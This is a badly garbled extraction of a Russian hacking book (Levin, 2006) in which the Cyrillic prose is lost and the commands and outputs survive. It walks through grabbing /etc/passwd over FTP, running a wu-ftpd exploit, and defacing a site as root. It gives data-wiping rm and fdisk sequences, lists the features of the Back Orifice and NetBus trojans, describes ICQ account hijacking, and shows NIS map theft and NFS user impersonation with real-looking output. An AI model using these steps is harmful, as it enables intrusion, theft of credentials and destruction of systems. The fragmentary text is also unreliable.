levin m. haking 1

Upload: geoarmy

Post on 08-Apr-2018

  • 8/7/2019 Levin M. Haking 1

    1/112

    :

    681.3 32.973.26018.2

    363

    ., 2006

    ,2006

    .363 :

    . .: , 2006. 224 .

    .

    681.3 32.973.26018.2

    2006

    , .

    , , , .

    ,

    (, TCP/IP). .

    ?

    !

    .

    :

    Linux

    RedHat

    UNIX SlackWare

    UNIX

    FreeBSD , UNIX

    : Linux BSD (FreeBSD,OpenBSD, NetBSD)? .

    .

    , :

    ftp 21

    telnet 23

    smtp 25

    http 80

    pop3 110

    .

    , :FTP (21)

    , FTP, , .

    FTP? File Transfer Protocol( ). , FTP , 21 , , .

    TELNET (23)

    , ( ), .

    telnet ? , (!) ( !) .

    SMTP (25)

    , ,

    ? ,

    . Simple Mail Transfer Protocol .

    HTTP (80)

    Hyper Text Transfer Protocol .

    , , , Internet.

    web, ( ) . , .

    , ! , web .

    POP3 (110)

    MailAgent (, Microsoft Outlook).

    () .

    ? ,

    UNIX . ( ) UNIX.

    Windows (MUST_DIE), (A, B, C,D) :

    C:\MUST_DIE\die.com

    UNIX /, ( CDROM) (,/cdrom).

    . .

    .

    /etc. () /etc passwd .. /etc/passwd.

    , , ,

    , .

    , !

    , IP.

    :tracert ( UNIX traceroute)

    w3.cnn.com

    ( ) IP

    (IP Internet. 195.55.55.55 ( 0255 .. 0255.0255.0255.0255).

    ftp (

    IP). ? MSDOS PROMPT MSDOS.

    ( ) login. Internet.

    Password.

    Internet.

    ( , , ! w3.dos.net IIS

    (Internet Information Server), !

    .

    :

    Directory /home/usr/_ not found

    Logging in "/"

    , , .

    :

    ftp> ( ) get /etc/passwd

    .? . , find MUST_DIE passwd (). ,

    ftp (.. MUST_DIE). , find.

    , . , , , !

    ,

    ! :

    , .

    ?

    IP . , , . , .

    : ? ,

    Internet. TCP/IP (Transfer ControlProtocol/Internet Protocol) ,

    Internet. .

    Internet, IP (, ppp10335.dialup.glasnet.ru). ( ) , . ,

    , IP:port ( , 195.34.34.30:21 , FTP zone.ru).

    , ,

    23 ( telnet) ( telnet ip:port. , 23). , .

    /, . ,

    , , .

    23 , ,

    . .

    ( ). 273275 , , , ,

    :

    , Internet. , . . , .

    ( 19).

    , , .

    , .

    (Finger).

    finger , , , .

    ,

    ? 1 1024 (wellknown). , services. Windows

    C:\_Windows\SERVICES\. NT C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICES. /etc/services/

    ( , ). , (WWW, mail,FTP, news, telnet). , SMTP

    25 ,POP3 110 , WWW 80 , FTP 21

    , ,

    . ! , ( ) , .

    , , , ( ,

    Internet !).

    .

    .

    , ?

    , . . ,

    sendmail ( wiz debug FTP, ).

    , , .

    Windows

    .

    , Internet. , .

    . , , . . , ++,

    (root) , !!! FTPBounce , , FTP( / / ) ,

    . ( ). ,

    FTP ,

    . ( ). ,

    ( !).

    , ( !), . ,

    : NT, VMS UNIX. UNIX BSD, AIX, SCI, Sun OS, Irix () .

    , , NT, UNIX, Sun OS (, ).

    ,

    , , .

    . , ?

    ,

    netstat a ( ) :

    Active Connections

    Proto  Local Address          Foreign Address   State
    TCP    localhost:1027         0.0.0.0:0         LISTENING
    TCP    localhost:135          0.0.0.0:0         LISTENING
    TCP    localhost:135          0.0.0.0:0         LISTENING
    TCP    localhost:1026         0.0.0.0:0         LISTENING
    TCP    localhost:1026         localhost:1027    ESTABLISHED
    TCP    localhost:1027         localhost:1026    ESTABLISHED
    TCP    localhost:137          0.0.0.0:0         LISTENING
    TCP    localhost:138          0.0.0.0:0         LISTENING
    TCP    localhost:nbsession    0.0.0.0:0         LISTENING
    UDP    localhost:135          *:*
    UDP    localhost:nbname       *:*
    UDP    localhost:nbdatagram   *:*

    . , .

    , Local Address () 135, 137, 138 nbsession ( 139 netstatan, , .

    MicrosoftNetworking LAN ( ). Internet , www.uxx.com, , www.happyhacker.org. ( www.whitehouse.gov). netstat a :

    Active Connections

    Proto  Local Address     Foreign Address         State
    TCP    localhost:1027    0.0.0.0:0               LISTENING
    TCP    localhost:135     0.0.0.0:0               LISTENING
    TCP    localhost:135     0.0.0.0:0               LISTENING
    TCP    localhost:2508    0.0.0.0:0               LISTENING
    TCP    localhost:2509    0.0.0.0:0               LISTENING
    TCP    localhost:2510    0.0.0.0:0               LISTENING
    TCP    localhost:2511    0.0.0.0:0               LISTENING
    TCP    localhost:2514    0.0.0.0:0               LISTENING
    TCP    localhost:1026    0.0.0.0:0               LISTENING
    TCP    localhost:1026    localhost:1027          ESTABLISHED
    TCP    localhost:1027    localhost:1026          ESTABLISHED
    TCP    localhost:137     0.0.0.0:0               LISTENING
    TCP    localhost:138     0.0.0.0:0               LISTENING
    TCP    localhost:139     0.0.0.0:0               LISTENING
    TCP    localhost:2508    zlliks.505.ORG:80       ESTABLISHED
    TCP    localhost:2509    zlliks.505.ORG:80       ESTABLISHED
    TCP    localhost:2510    zlliks.505.ORG:80       ESTABLISHED
    TCP    localhost:2511    zlliks.505.ORG:80       ESTABLISHED
    TCP    localhost:2514    whitehouse.gov:telnet   ESTABLISHED

    , . , , 4 zllinks.505.ORG 80 whitehouse.gov . , Internet.

    www.happyhacker.org (zlliks.505.ORG). , 1024??? , , , . ,

    ,

    1024 . ? , 2508 2511.

    ? Internet () netstat r. :

    Route Table

    Active Routes:

    Network Address    Netmask            Gateway Address   Interface         Metric
    0.0.0.0            0.0.0.0            198.59.999.200    198.59.999.200    1
    127.0.0.0          255.0.0.0          127.0.0.1         127.0.0.1         1
    198.59.999.0       255.255.255.0      198.59.999.200    198.59.999.200    1
    198.59.999.200     255.255.255.255    127.0.0.1         127.0.0.1         1
    198.59.999.255     255.255.255.255    198.59.999.200    198.59.999.200    1
    224.0.0.0          224.0.0.0          198.59.999.200    198.59.999.200    1
    255.255.255.255    255.255.255.255    198.59.999.200    0.0.0.0           1

    Active Connections

    Proto  Local Address      Foreign Address       State
    TCP    lovelylady:1093    mack.foo66.com:smtp   ESTABLISHED

    Gateway Address Interface IP ( IP , ). ,

    , 10 , , , ( ) , ( ).

    , Internet . p: . ? . .

    e

    mail UUPC . online

    offline . init init1 \UUPC. login password. . Ho ,

    .

    usera , login:.

    .

    , Netscape, SLIP & PPP, ,

    y , . , . transmit . , , Windows.

    , :

    .pwl. Windows . . , DES. Ho . ,

    .pwl , 1,2,3,4 , , .

    ,

    . , . . . ,

    . BBS, . ! Ha 100%. login, password. , .

    ,

    . yp ( )

    . .

    login/passwd,

    . root . Ho . , , .

    UNIX:FreeBSD, BSDI, SCO open server, Linux., , NexStep, UnixWare, Solaris,Aix, HPUX, VAXORX5.12. , Xenix. Ho

    , , AT&T UNIX 1971 . UNIX:

    (daemon) .

    exploit:

    ftp wuftp2.42; wuftp2.60 qpopper proftp . exploit

    openSource ( ), ++.

    UNIX. exploit ( ) UNIX wuftp2.42 ( root):

    #gcc .

    #./a.out

    ( )

    IP , offset , ,

    () (

    5000 +5000 +100, .. : 5000 4900

    4800 0 100 200 5000).

    , . , ,

    (patch) , (bugs) .

    , .

    root?Root

    . Root , root (superuser), , !

    root? root (, , , ).

    ? exploit. ,

    exploit. ? , C++, , , .

    () exploit remote access ( ), ..

    exploit ( , ) remoteaccess.

    ?

    , ( ), ?

    1. (,).

    2. .

    3. , .

    , . : /etc (

    ), ftpusers ( BSDI UNIX), default () root 21

    (ftp) . joe ( ) root ftp.

    ? root #, (Ctrl+k,

    x).

    ( root):

    #joe /etc/ftpusers

    root #, Ctrl+k, x.

    , , ( ?).

    , root , root

    , ( ) , !

    :

    #ftp ip_address or host_name

    login: root

    password: !

    !

    root ! ( , )

    ? ! exploit!

    :

    login incorrect

    1 1.000.000 ( ), , () .

    exploit( , root). :

    #passwd

    :

    New unix passwd:

    ( ) 12345

    :

    Unix password too weak, please

    retype password:

    ?

    , UNIX MUST_DIE!

    : Abc04k9834z

    ? !

    , , ! ,

    ! , () ZRHEN.

    12345 :

    Retype password:

    12345

    , ! FTP.

    #ftp

    ftp>open ip_address or host_name

    ( ,

    , )

    login: root

    password: 12345

    ! ( , ? WWW !)

    ftp bye:

    ftp>bye

    .

    ftp, ?

    !

    telnet ( 23), .

    exploit

    , :#telnet 127.0.0.1 80

    127.0.0.1 loopback .. ip; 80 HTTP (Hyper

    Text Transfer Protocol) , , :

    we hack you

    , ( , ?).

    , , .. . , !

    ?

    !

    ?

    ()

    : , apache ( web). :

    #which apache

    :

    /usr/sbin/apachectl

    /usr/local/sbin/apachectl

    , , , , DocumentRoot(httpd.conf). :

    /usr/etc/apache

    /usr/local/etc/apache

    ( ) apache DocumentRoot (home_dir) :

    /www

    /home/www

    /usr/local/www

    :

    #cd home_dir home_dir www. index.htm index.html. ?

    :

    #ls full | more

    (www). :

    #rm index.htm (index.html)

    .

    :

    #joe index.htm (index.html)

    ( joe) :

    This site hacked by Vasya

    Ctrl+k, x.

    joe .

    ! UNIX

    , . , Internet:

    Ftpd (ftp daemon) port 21
    Telnetd (telnet daemon) port 23
    Smtpd (smtp daemon) port 25
    Httpd (http daemon) port 80
    Pop3d (pop3 daemon) port 110

    . ( roota) :

    #killall httpd

    web .

    #killall ftpd

    ftp .

    , :

    ( roota):

    #httpd start ( Linux)

    #apachectl restart ( FreeBSD

    web

    apache)

    ftpd:

    #ftpd ( !)

    . . , ( roota):

    #cd /

    #rm * ( (!)

    )

    #cd /boot

    #rm *

    #cd /bin

    #rm *#cd /sbin

    #rm *

    #cd /usr/bin

    #rm *

    #cd /usr/sbin

    #rm *

    , ( /etc, ).

    , .. rm

    : /bin /sbin /usr/bin /usr/sbin ,

    ( rm ). :

    #which rm

    , rm. .

    ?

    :

    #cd /etc

    #rm *

    !

    :

    #reboot

    ( )

    , 100%

    ? ( roota):

    #fdisk

    p ( . (, 4), :

    d (enter), 4 (enter)

    d (enter), 3 (enter)

    d (enter), 2 (enter)

    d (enter), 1 (enter)

    w nter.

    ! !( !)

    UNIX dd, ( )., . SlackWare:

    :hda1 slack ; hda2 dos ; hdc2

    slack

    ( , DOS, , MBR (Master Boot Record)

    hdc2 (SlackWare). UNIX ? ! ):

    dd /dev/hda /dev/hdc 0 512

    :

    512 . 512 ?Master Boot Record (MBR).

    512 ( )

    ???

    dd () hda hdc!

    hdc!

    , Ctrl+, dd. dd 20

    8 , Internet 2

    : dd fdisk.

    , ( ).

    99%

    (), () ! (

    () .

    () ( portscanner):

    #portscanner 55.55.55.55 1 1024

    55.55.55.55 IP ; 1

    ;1024 .

    ( n ) ( ):

    21

    2225

    80

    110

    :

    Count.dat .

    2. : (, ):

    Count.cgi 755. ..

    #chmod 755 count.cgi

    Count.cgi 777. ..

    #chmod 777 count.dat

    telnet , ftp , ftp, chmod ftp.

    count.cgi:

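    #!/usr/bin/perl
    # Simple hit counter: reads the number from count.dat, increments it, writes it back.
    print "Content-type: text/html\n\n";
    open (file,"count.dat");      # read the current value
    @dat=<file>;
    close (file);
    $dat[0]++;
    open (file,">count.dat");     # overwrite the file with the new value
    print file "$dat[0]\n";
    close (file);
    print " $dat[0]\n";           # show the new value on the page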

    count.dat ( 5).

    ! , count.cgi 1.

    CGI

    ( ) .. CGI ! ( ,.. , ), : .

    ( , )

    ( email ). email :

    cat /etc/passwd

    cat /etc/master.passwd

    cat /etc/shadow

    (). , , .

    :

    Root:fdkjhgSFDgf:

    ( john the ripper) .:

    .

    , .

    ? , () () .

    ,

    , , , .

    , () , () .

    ? () .core.

    ? , , , , .

    , realnetworks ( realaudio/realvideo). ,

    UIN: Bugs, Crack

    Social Engineering

    :

    ,

    UIN ,

    , . , .

    : Internet

    , . . C:\ . ICQ. UIN 20xxxx 80xxxxx. C:\Program Files\ICQ\UIN number.uin , , e

    mail . , keyboard sniffer , .

    ICQ Low, Medium High.

    . ,

    , ICQ. ( , ). UIN , , , reboot, ,

    ICQ , keyboard sniffer . .

    ,

    : , sniffer .

    , ? ,

    ?

    ,

    , UIN

    http://www.icq.com/password/ ICQ

    email .

    UIN

    email.

    . , POP3Password Crack

    . , . , hotmail.com , email , .

    : ICQ 777777.

    UIN! email, [email protected]. UIN , 2 . sometihg.com email , . , email

    777777. ,

    : email .

    (: email , web ), web.

    [email protected]? ,

    ( email ) [email protected]. . , :

    , . . , , . , 80% , ,

    .

    . UIN , email .

    ,

    , ICQ 8 . Windows UIN .

    Linux, , , password, ( ,

    root ).

    Linux ICQ , UIN

    9, . ?

    UINa. Linux ICQ , .

    ICQ ,

    : ICQ email?

    : , ICQ

    ICQhijeck. IP, UINa ICQhijeck spoofed , , .

    .

    , .

    : , . ICQ?

    : . , , ICQsniff , ICQ . , ,

    , . , , , , , , , .

    : ICQhijeck,ICQsniff, keyboard sniffer, TCP/UDP sniffer

    , ?

    :

    Private Bug, . , , ICQ, .

    tools ? , , . .

    . ,

    , , www.yahoo.com. .

    ,

    , UIN ,

    ICQ.

    , , , ICQ

    .

    , ICQ , Windows. ,

    www.icq.com ICQ, . , .

    . web .

    free email, freewebhosting . , email, .

    , , , email

    ICQ .

    , , .

    .

    Internet , , ,

    . ,

    ICQ ,

    . , ICQ ? ,

    Internet

    .

    , Nuke 139, http://www.microsoft.com .

    Internet , , Proxy , , http://www.gin.ru.

    :http://www.teamcti.com/pview/PrcView.zip, ,

    : RUN Windows 95/98

    : regedit Windows(For Lamers). HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. , , Internet ! , !

    , sharin ssl

    , cgi , .

    ()

    (

    ) :

    1.

    , , C++, Visual C++, Delphi, , 16 32

    ( Windows95/98)

    2. , . , . , , .

    1

    !!! !!! ? , , 2

    , http://www.microsoft.com.

    :

    1. 1632 :

    .

    . . , !!! NeoLite,

    :http://www.neoworx.com. .

    2. , , , !!! ! 2 1!

    Back

    Orifice

    BO 4

    . , 4 .:

    BoServ.exe

    .

    , . Windows

    . (, PrcView) .exe. Bo. Windows\system\windll.dll,

    Bo.

    BoGui.exe

    .

    .

    BoConfig.exe

    , BoServ.exe .

    , , ..

    BoClient.exe

    , BoGui.exe,

    Target host:port

    , BO. , , 31337.

    :

    Directory create

    ().

    Directory list

    Directory remove

    Export add sharing

    Export delete

    sharing

    Export list

    sharing

    File copy

    File delete

    File find

    File view

    HTTP enable

    HTTP

    HTTP disable

    HTTP

    Key log begin

    Key log end

    MM capture avi

    .avi

    MM capture frame

    frame

    MM capture screen

    Screen Shot c

    MM list capture device

    MM play sound

    Net connections

    Net delete

    Net use

    Net view

    Ping host

    Bo

    Process kill

    Process list

    Process spawn

    Reg

    Windows System dialog box

    System info

    System lockup

    System passwords

    System reboot

    .

    !

    NetBus

    Net Bus

    2 .patch.exe

    . ,.. , .

    Netbus.exe

    .

    Net Bus:

    Host name/IP

    Port

    , 12345

    Server admin

    . , ..

    Open CDROM

    CDROM

    Show image

    Swap mouse

    Start program

    Msg manager

    Screendump

    Screen Shot

    Get info

    Play sound

    Exit Windows

    Send text

    Active winds

    Mouse pos

    Listen

    OnLine, Ctrl+Esc,Alt+ Tab ..

    Sound system

    Server setup

    patch.exe

    Control mouse

    Go to URL

    URL

    Key manager

    File manager

    ( )

    ,

    Net Bus Users & Lamers. patch.exe . Back Orifice .

    . . Internet

    Back Orifice

    Back Orifice Eliminator ,

    BO!!! IP , BO Server,

    Net Bus

    Net Buster , Net Bus!!! IP , patch.exe (, , ),

    c:\. 1000 .

    IP ICQ?

    icqs.exe. icqs.rar.

    ?

    ,

    , , , , , ,,

    , , , .

    IP Internet . ,

    , http://www.yandex.ru, .. ,, email ( Guest Book`s,, IP

    ). , IP, , , , , , , IP,

    , IP,

    , .. ( )

    ( ), Internet , . .

    , Internet , ,

    ., , .

    exploit, , , .

    , , , ( ?), , , exploit

    , , . , , .

    .

    . , , .

    , !

    ? ! . . , , . Internet( ). !

    etc/passwd

    RU.HACKER RU.NETHACK

    : etc/passwd? , ?

    , , ,

    , , . , , , , .

    ? , , , , . , ! ! ! http://kpnc.webprovider.com/hack.pl, etc/passwd , .

    ! ( demo Demo User

    , ! ( , Netscape, ;

    IE 4.0 (5.0) , , etc/passwd , , ,, , ).

    :

    DISPLAY ETC/PASSWORD FILE

    LOGIN        NAME                   DIR
    root         System Administrator   /root
    toor         System Administrator   /root
    daemon       System Daemon          /
    sys          Operating System       /tmp
    bin          BSDI Software          /usr/bsdi
    operator     System Operator        /usr/opr
    uucp         UNIXtoUNIX Copy        /var/spool/uucppublic
    games        Games Pseudouser       /usr/games
    news         USENET News,,,         /var/news/etc
    demo         Demo User              /usr/demo
    mail         Sendmail               /var/spool/mail
    brian        Brian Atkins,,,        /export/home/brian
    kannada      Narendra Tumkur        /disk1/k/kannada
    pumpkin2     liao xin               /disk1/p/pumpkin2
    lost508      no idea                /disk1/l/lost508
    essepi       Salvatore Calarco      /disk1/e/essepi
    rajatbhasin  Rajat Bhasin           /disk1/r/rajatbhasin
    panze        Congo Koa              /disk1/p/panze
    goni1        Naseer Bhatti          /disk1/g/goni1
    madmama      patty noland           /disk1/m/madmama
    yccwp        yang changchun         /disk1/y/yccwp

    . , . .

    , .

    ,

    , , , , , , . , , ,

    :LOGIN NAME DIR

    demo Demo User /usr/demo

    . ,

    ?

    ?

    ? , . , , , !

    ? ? , ,

    (, )!

    , ,

    . nethackk1.htm ( HTML) :

    etc/pasw ?

    HTML, , , , hack.pl.

    ? html? , hack.pl. , . hack.pl ? , ,

    ?

    , , ! ,

    . , , madmama. ?

    madmama.webprovider.com ?

    Index of /

    Name                     Last modified     Size  Description
    [DIR] Parent Directory   09Oct1999 11:10
    [DIR] _private/          09Oct1999 11:30
    [TXT] form.html          09Oct1999 12:26   1k
    [DIR] images/            09Oct1999 11:30
    [TXT] irc.html           09Oct1999 12:21   0k
    [TXT] mamairc.html       09Oct1999 12:18   4k
    [TXT] postinfo.html      09Oct1999 11:30   2k
    [TXT] thank_you.html     09Oct1999 12:26   1k

    ! _private.

    , ? . , !

    , , !

    , . madmama , !!!

    ? , dbf prices. ,

    c. , . ! ,

    !

    , , ? , ? , ,

    ( ). . Etc/password , ( ) . ! Etc/password

    !

    etc/password ,

    ., ,

    , .

    , . ,

    , :news USENET News,,, /var/news/etc

    ( , ,NetInfo), c , .

    , , , . POP3 ( ), SMTP ( ).

    , etc/password! ? ftp (, ).

    ftp://ftp.werbprovider.com . , .

    , WWW FTP

    , UNIX

    , . etc/password

    ( ) .

    ?

    UNIX UNIX , UNIX, , ,

    , .

    Red Hat Black Cat , UNIX hobbiton.org ( , telnethobbiton.org 'newuser').

    ,

    UNIX

    , . , , , . , , !

    , UNIX, . , , , UNIX,

    . UNIX

    Mortal Commander ( NortonCommander)

    Windows. UNIX, . Mortal Commander .

    LINUX bash

    .

    , , .

    .

    (, , TC, TENEX PDP10).

    . ,

    , . AT&T System V, .

    , , GNU, bash Borne AgainShell.

    ,

    CShell . , , .

    , , , ( )., , .

    cat /etc/shells, UWIN :

    cat /etc/shells
    /usr/bin/ksh
    /usr/bin/sh
    /usr/bin/tcsh
    /usr/bin/csh
    /bin/sh
    /bin/ksh
    /bin/csh
    /bin/tcsh

    ,

    (, ), .

    exit. . (

    /usr/bin /bin

    , ).

    $ echo $SHELL
    /usr/bin/ksh
    $ /usr/bin/sh
    # echo $SHELL
    /usr/bin/ksh
    # exit
    $ /usr/bin/tcsh
    # echo $SHELL
    /usr/bin/ksh
    # exit
    $ /usr/bin/csh
    %echo $SHELL
    /usr/bin/ksh
    %exit

    command.com (MSDOS) dir, UNIX

    .

    , . UNIX ls, /bin. , CYGWIN

    , fileutils.tar.gz .

    ,

    ls /.ls /

    A                     E       proc
    base.bat              etc     reg
    baseserviceslink.sh   F       sys
    bin                   H       tmp
    C                     home    usr
    D                     lib     var
    dev                   linka   win

    , /etc , ls:

    $ ls /etc , ,

    crontab      inetdconfig.sh   passwd.add   traceit
    in.ftpd      init.exe         priv.exe     tracer.exe
    in.rlogind   login.allow      profile      ucs.exe
    in.rshd      login.deny       rc           ums.exe
    in.telnetd   mailx.rc         services
    inetd.conf   mkpasswd.exe     shells
    inetd.exe    passwd           stop_uwin

    ? , ? ? ., , web. Java VisualBasic. , , ,

    . , .

    , HTML. HTML

    . HTML ., , , Java . . .

    ? ,

    . ..

    , , ,

    ( ) . , , . ,

    , (, , ).

    , .

    CGI BIN

    , ?

    CGIBIN. , . exe BackOrifice2000., . ,

    , PentiumPro Windows NT, .

    , . DEC Alpha UNIX.

    , ? . , .

    NT. Perl , UNIX, NT. , , . , .

    ? PL!, Perl. , ! , Perl! , .

    ! .

    , .

    (, www.agava.ru). ?

    , , . !

    ! , , , , , .

    , www cgibin

    , !

    VirtualAve

    20

    , , , !

    , , , !

    ,

    CGI CGI , , .

    . ?

    , , Internet ! , , ! , CGI+Free+Perl , .

    , , , .

    20 . cgibin,

    Perl. sendmail,

    ( ).

    ,

    http://yourname.virtualave.net/. FTP,

    (, ftp://server26.virtual.ave). .

    . ., . , . , .

    Hypermart

    10 ( ), , Perl .

    ,

    Webjump

    25

    .

    , http://yourname.hypermart.net/., , http://server26.hypermart.net/ kpnc .

    FTP, , , .

    , , email. email , . , , ZMAIL.RU TELEMEDNET.RU. , .

    25 CGIBIN, () , Perl , .

    , , , ( ) !

    ProHosting

    ,

    . . .

    JustFree

    cgibin . ,

    , , .

    !

    , FTP WWW

    , ,

    . , . , , , ,

    !

    ., , FTP. FTP,

    . , FAR.

    FTP.

    , ( , ).

    FTP WWW, !

    . Enter . , , , . !

    , , , Norton Commander, , .

    ? , /CGIBIN, ! ! . , . HyperMart , VirtualAve /public_html. , . Perl. , .

    /var/news/etc

    demo Demo User

    nonroot Nonroot root user for

    NFS/nonexistent

    demo     Demo User            /usr/demo
    mail     Sendmail             /var/spool/mail
    brian    Brian Atkins,,,      /export/home/brian
    alias    ,,,                  /var/qmail/alias
    qmaild   ,,,                  /var/qmail
    qmaill   ,,,                  /var/qmail
    qmailp   ,,,                  /var/qmail
    qmailq   ,,,                  /var/qmail
    qmailr   ,,,                  /var/qmail
    qmails   ,,,                  /var/qmail
    ftp      FTP Daemon,,,        /var/spool/ftp
    proftp   FTP Daemon,,,        /var/spool/ftp
    www      Publish Account,,,   /usr/home/www
    nobody   Unprivileged user    /nonexistent

    NFS/nonexistent

    hmvbin 6553666559 reserved for

    hmv/nonexistent

    ! !(, demo). , ? , ,, , .

    , , , .

    1

    . , .

    ! !

    2

    , , , , .

    ( ) ! ? ,

    3

    ? , .

    , , . , , ( ), , ( web , ).

    |mail [email protected]

    href=http://kpnc.id.ru>PRO

    HACK
    ";

    print "DISPLAY ETC/PASSWD FILE \n";print "";

    print "";

    print " LOGIN";

    print " NAME";

    print " DIR";

    open(PASS, "

    EP/IX                   /etc/shadow
    HPUX                    /.secure/etc/passwd
    IRIX 5                  /etc/shadow
    Linux 1.1               /etc/shadow
    OSF/1                   /etc/passwd[.dir|.pag]
    SCO Unix #.2.x          /tcb/auth/files//
    SunOS4.1+c2             /etc/security/passwd.adjunct
    SunOS 5.0               /etc/shadow
    System V Release 4.0    /etc/shadow
    System V Release 4.2    /etc/security/ database
    Ultrix 4                /etc/auth[.dir|.pag]

    ? .

    open(PASS, "

    . ( )., , ,

    . . .

    ? , : finger, rusers,showmount, rpcinfo, dns, ftp, sendmail .

    . ?

    allias, nameserver , . nslookup.

    # g @

    [www.xxx.xxxx.su]

    Login NameTTY Idle When

    Office

    kuzmenko Vladimir Kizmenko p0

    4:57 Sun 08:25

    kuzmenko Vladimir Kizmenko p1

    2:38 Sun 08:26

    milichen Yuri Mulichenko p44:59 Fri 19:41 3B/r410 13513

    sherbak Eugeny Scherbkov p5

    5:00 Sat 10:18 221/r448 17733

    devil# finger [email protected]

    [ccsix.xxxx.xxxx.ru]Login: yur

    Name: Yuri A. Podgorodsky

    Directory: /home/yur

    Shell: /bin/bash

    On since Sat Apr 12 12:24 (MSK) on

    ttyp0 from jannet.xxxx.xxxx3 hours 35 minutes idle

    Mail forwarded to

    [email protected]

    No mail.

    No Plan.

    devil# rusers l unisun.xxxxxxxx.net

    Login Name

    TTY When Idle

    unknown

    100000 2 udp

    0 0 0 0 0

    Host

    lavrov unisun.xxxxx

    xxx:console Apr 2 10:32 17:37suh unisun.xxxxx

    xxx:ttyp0 Apr 5 10:20

    17:32 (mskws.desy.de)

    lavrov unisun.xxxxx

    xxx:ttyp1 Apr 2 11:21

    25:55 (:0.0)lavrov unisun.xxxxx

    xxx:ttyp2 Apr 2 10:33

    97:11 (:0.0)

    ,

    , shell , . Idle, , .

    2. rpcinfodevil# rpcinfo sun10.xxx.xxx.su

    program version netid address

    service owner

    100000 2 tcp

    0.0.0.0.0.111 rpcbind

    0.0.0.0.0.111 rpcbind

    unknown

    100004 2 udp0.0.0.0.2.150 ypserv

    unknown

    100004 2 tcp

    0.0.0.0.2.151 ypserv

    unknown

    100004 1 udp0.0.0.0.2.150 ypserv

    unknown

    100004 1 tcp

    0.0.0.0.2.151 ypserv

    unknown

    100069 1 udp

    0.0.0.0.2.152

    unknown

    100069 1 tcp

    0.0.0.0.2.154

    unknown

    100007 2 tcp

    0.0.0.0.4.0 ypbindunknown

    100007 2 udp

    0.0.0.0.4.3 ypbind

    unknown

    100007 1 tcp

    0.0.0.0.4.0 ypbind

    unknown

    100007 1 d

    100005 2 tcp

    0.0.0.0.2.226 mountd

    k

    100007 1 udp

    0.0.0.0.4.3 ypbind

    unknown100028 1 tcp

    0.0.0.0.2.156 ypupdated

    unknown

    100028 1 udp

    0.0.0.0.2.158 ypupdated

    unknown100009 1 udp

    0.0.0.0.3.255 yppasswdd

    unknown

    100029 1 udp

    0.0.0.0.2.159 keyserv

    unknown

    100003 2 udp0.0.0.0.8.1 nfs

    unknown

    100005 1 udp

    0.0.0.0.2.223 mountd

    unknown

    100005 2 udp0.0.0.0.2.223 mountd

    unknown

    100005 1 tcp

    0.0.0.0.2.226 mountd

    unknown

    unknown

    100024 1 udp

    0.0.0.0.2.226 statusunknown

    100024 1 tcp

    0.0.0.0.2.228 status

    unknown

    100021 1 tcp

    0.0.0.0.2.229 nlockmgrunknown

    rpcinfo RPC . mountd, nisd, ypserv ypbind, statd, bootparam, pcnfsd, rexd. statd .pcnfsd mountd , rexd .

    3. NIS (nisd, ypbind, ypserv).

    NIS

    , NIS NIS rpc . :

    devil# ypx dg sun10.xxx.xxx.su

    Trying domain sun10.xxx.xxx.su

    Trying domain sun10

    Trying domain xxx xxx su

    YP map transfer successfull.

    Trying domain xxx.xxx.su

    sysdiag:*:0:1:Old System

    Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag

    sundiag:*:0:1:System

    Diagnostic:/usr/diag/sundiag:/usr/diag

    /

    sundiag/sundiag

    sybase:*:13:55:syb:/usr/nms/sybase:/bin/csh

    nobody:*:65534:65534::/:

    daemon:*:1:1::/:

    audit:*:9:9::/etc/security/audit:/bin/

    csh

    uucp:*:4:8::/var/spool/uucppublic:

    sync:__F324VMRDcL6:1:1::/:/bin/syncroot:__Ye.Ibw.8uQg:0:3:Operator:/:/bin

    /csh

    news:*:6:6::/var/spool/news:/bin/csh

    sys:*:2:2::/:/bin/csh

    snm:__7ck.pfEh/2s:11:11:Network

    Manager:/usr/snm:/bin/cshrom:__IriAsoksSeE:10:10:Victor

    Romanchik:/usr/rom:/bin/csh

    nms:*:12:55:Network

    Manager:/usr/nms:/bin/csh

    bin:*:3:3::/bin:

    __ .

    NIS , bootparam /var/yp, .

    4. showmountdevil# showmount e

    thsun1.xxxx.xxxxx.su

    export list for thsun1.xxxx.xxxxx.su:

    /pub

    (everyone)

    /optthsun2,thsun3,tlx39

    /pgm/linux

    (everyone)

    /export

    (everyone)

    /usr

    (everyone)/tftpboot

    (everyone)

    /cdrom/sol_2_3_hw894_sparc/s0

    (everyone)

    /home

    (everyone)

    /scratch/users

    (everyone)

    512 Feb 14 11:16 lnp

    drwxrxrx 6 root other

    512 Feb 14 11:19 lnup

    (everyone)

    showmount , , . export, home, usr !

    devil# mount F nfs

    thsun1.xxxx.xxxxx.su:/home /mntdevil# cd /mnt

    devil# ls al

    total 12524

    drwxrxrx 17 root root

    1024 Jun 28 1996 .

    drwxrxrx 28 root root1024 Apr 12 16:29 ..

    drwxrxrx 2 root root

    512 May 19 1995 TT_DB

    drwxrxrx 3 root 798

    512 Nov 25 1994 cfi

    drwxrxrx 6 root 100

    512 Nov 25 1994 dugdrwxrxrx 9 root other

    512 Feb 17 11:19 lcta

    drwxrxrx 3 root other

    512 Jun 19 1996 lhep

    drwxrxrx 6 root other

    512 Feb 14 11:19 lnup

    drwxrxrx 4 root other

    512 Jan 15 1995 lnurdevil# cd lnup

    devil# ls al

    total 12

    drwxrxrx 6 root other

    512 Feb 14 11:19 .

    drwxrxrx 17 root root1024 Jun 28 1996 ..

    drwxrxrx 3 6000 600

    512 Oct 30 1995 dolbilov

    drwxrxrx 9 6190 600

    1024 Oct 7 1996 davgun

    drwxrxrx 4 6001 600

    512 Oct 20 1995 gvfdrwxrxrx 4 6003 600

    512 Apr 4 10:31 yup

    devil# echo 'dolbilov::600:' >>

    /etc/groups

    devil# echo

    'dolbilov:x:6000:600::/noway:/bin/csh'>> /etc/passwd

    devil# su dolbilov

    $ cd dolbilov

    $ ls al

    total 30

    drwxrxrx 3 dolbilov dolbilov

    512 Apr 12 16:21 .

    drwxrxrx 6 root other

    220 www.xxx.ru ESMTP Sendmail

    8.8.5/8.8.5; Sat, 12 Apr 1997

    15:55:36 +0400

    drwxr xr x 6 root other

    512 Feb 14 11:19 ..

    rwrr 1 dolbilov dolbilov2901 Apr 7 1993 .cshrc

    rwrr 1 dolbilov dolbilov

    1550 Apr 7 1993 .login

    rwrr 1 dolbilov dolbilov

    2750 Apr 7 1993 .rootmenu

    rwrr 1 dolbilov dolbilov478 Apr 7 1993 .sunview

